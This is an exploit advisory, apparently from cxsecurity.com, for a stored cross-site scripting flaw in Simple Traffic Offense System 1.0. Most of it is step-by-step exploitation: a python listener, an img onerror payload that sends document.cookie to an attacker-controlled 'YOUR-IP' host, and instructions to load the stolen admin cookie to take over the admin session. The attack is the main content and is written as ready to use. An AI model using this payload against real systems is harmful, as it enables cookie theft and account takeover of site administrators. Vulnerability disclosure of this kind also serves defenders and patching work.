Simple Traffic Offense System 1.0 Cross Site Scripting

2021.04.05
Credit: Richard Jones
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Traffic Offense System | Stored Cross Site Scripting (Cookie-theft) # Exploit Author: Richard Jones # Date: 03-04-2021 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/12330/simple-traffic-offense-system-php.html # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 Stored XSS by adding a offense report. Steps 1. Using an officer account, login to the application. 2. Start a python server (python3 -m http.server 8090) 3. Goto Report Offense, make a report, add payload below in the name or address field Payload: "><img src=x onerror="this.src='http://YOUR-IP:8090/?'+document.cookie; this.removeAttribute('onerror');"> 4. Wait for the admin to login. 5. Cookies will show in the python server 6. Get admin access here: http://TARGET/trafic/index.php , open dev tools (f12), add cookie to session and refresh page to be logged in as admin.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top